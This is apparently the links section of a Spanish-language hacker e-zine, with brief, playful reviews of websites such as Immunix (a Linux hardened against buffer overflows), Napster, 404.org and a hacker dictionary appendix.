   Podriamos decir que esta pagina es un 'tributo' de Sil a JP pero
   eso la convertiria en una mas de las multiples paginas dedicadas
   al mismo fin. Ademas de eso Antioffline esconde varias sorpresas.

--[ http://inmunix.org ]

  Aterrado por los desbordamientos de buffer?. Segun todos los estudios
  siguen constituyendo el metodo preferido y mas comun de ataque.
  Aparte de rezar puedes intentar protegerte usando un sistema operativo
  como Inmunix, una version especial de Red Hat Linux que pretende estar
  "inmunizada" ante este tipo de fallos.

--[ http:////www.freeweb.pdq.net/headstrong/ ]

  Solo dire el titulo de la pagina y ya podeis empezar a imaginar. 
  "Bizarre Stuff You can Make in your Kitchen".

--[ http://www.napster.com ]

  Dudo que haya alguien que no conozca esta pagina, pero como no esta
  muy claro si seguira abierta (al menos en su actual forma) os
  recomendamos que aprovecheis para ir y fastidiar a la RIAA.


--[ http://www.404.org ]
 
  Entre otras cosas, revistas en la que se mezclan filosofia, biologia,
  diatribas anti-sistema, estudios satiricos de la Biblia, la vision
  personal del mundo de su autora y la mafia en Minneapolis...
  Espera cualquier cosa menos algo convencional. 


--[ http//www.mcs.kent.edu/docs/general/hackersdict/03Appendices ]

  Una mirada nostalgica, ya se sabe que cualquier tiempo pasado fue
  mejor e indudablemente en ocasiones tambien mas divertido.
 
 

*EOF*
